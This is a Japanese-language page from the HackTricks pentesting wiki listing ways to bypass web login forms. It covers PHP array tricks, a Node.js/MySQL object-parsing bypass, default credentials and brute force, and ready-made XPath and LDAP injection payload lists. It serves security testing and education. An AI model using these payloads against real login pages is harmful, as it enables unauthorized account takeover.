Login Bypass

AWSハッキングを学び、練習する:HackTricks Training AWS Red Team Expert (ARTE) GCPハッキングを学び、練習する: HackTricks Training GCP Red Team Expert (GRTE)

HackTricksをサポートする

RootedCONは、スペインで最も関連性の高いサイバーセキュリティイベントであり、ヨーロッパで最も重要なイベントの一つです。技術知識の促進を使命とし、この会議はあらゆる分野の技術とサイバーセキュリティの専門家の熱い交流の場です。

通常のログインをバイパスする

ログインページを見つけた場合、ここにバイパスするためのいくつかのテクニックがあります:

  • ページ内のコメントを確認する(下にスクロールして右に?)

  • 制限されたページに直接アクセスできるか確認する

  • パラメータを送信しない(何も送信しないか、1つだけ送信する)

  • PHPの比較エラーを確認する: user[]=a&pwd=b , user=a&pwd[]=b , user[]=a&pwd[]=b

  • コンテンツタイプをjsonに変更し、json値を送信する(bool trueを含む)

  • POSTがサポートされていないという応答が返ってきた場合、GETリクエストでボディにJSONを送信してみることができます。Content-Type: application/json

  • nodejsの潜在的な解析エラーを確認する(これを読む):password[password]=1

  • Nodejsはそのペイロードを次のようなクエリに変換します:SELECT id, username, left(password, 8) AS snipped_password, email FROM accounts WHERE username='admin' AND`` ``password=password=1; これにより、パスワードビットが常にtrueになります。

  • JSONオブジェクトを送信できる場合、"password":{"password": 1}を送信してログインをバイパスできます。

  • このログインをバイパスするには、有効なユーザー名を知り、送信する必要があることを忘れないでください。

  • mysql.createConnectionを呼び出す際に**"stringifyObjects":true**オプションを追加すると、パラメータにObjectが渡されたときのすべての予期しない動作をブロックします。

  • 認証情報を確認する:

  • 使用されている技術/プラットフォームのデフォルトの認証情報

  • 一般的な組み合わせ(root、admin、password、技術の名前、これらのパスワードのいずれかを持つデフォルトユーザー)。

  • Cewlを使用して辞書を作成し、デフォルトのユーザー名とパスワード(ある場合)を追加し、すべての単語をユーザー名とパスワードとしてブルートフォースを試みる。

  • より大きな辞書を使用してブルートフォースブルートフォース

SQLインジェクション認証バイパス

ここでは、SQLインジェクションを介してログインをバイパスするためのいくつかのトリックを見つけることができます

次のページでは、SQLインジェクションを介してログインをバイパスするためのカスタムリストを見つけることができます:

Login bypass List

No SQLインジェクション認証バイパス

ここでは、No SQLインジェクションを介してログインをバイパスするためのいくつかのトリックを見つけることができます

NoSQLインジェクションはパラメータの値を変更する必要があるため、手動でテストする必要があります。

XPathインジェクション認証バイパス

ここでは、XPathインジェクションを介してログインをバイパスするためのいくつかのトリックを見つけることができます

' or '1'='1
' or ''='
' or 1]%00
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '
'or string-length(name(.))<10 or'
'or contains(name,'adm') or'
'or contains(.,'adm') or'
'or position()=2 or'
admin' or '
admin' or '1'='2

LDAPインジェクション認証バイパス

ここでは、LDAPインジェクションを介してログインをバイパスするためのいくつかのトリックを見つけることができます。

*
*)(&
*)(|(&
pwd)
*)(|(*
*))%00
admin)(&)
pwd
admin)(!(&(|
pwd))
admin))(|(|

Remember Me

ページに「Remember Me」機能がある場合、その実装方法を確認し、他のアカウントを乗っ取るために悪用できるかどうかを見てください。

Redirects

ページは通常、ログイン後にユーザーをリダイレクトします。そのリダイレクトを変更してOpen Redirectを引き起こすことができるか確認してください。ユーザーを自分のウェブサイトにリダイレクトすると、情報(コード、クッキーなど)を盗むことができるかもしれません。

Other Checks

  • ログイン機能を悪用してユーザー名を列挙できるか確認してください。

  • パスワード/敏感情報フォーム入力自動補完が有効になっているか確認してください:<input autocomplete="false"

​​RootedCONは、スペインで最も関連性の高いサイバーセキュリティイベントであり、ヨーロッパで最も重要なイベントの一つです。技術知識の促進を使命とし、この会議はあらゆる分野の技術とサイバーセキュリティの専門家が集まる熱い交流の場です。

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Last updated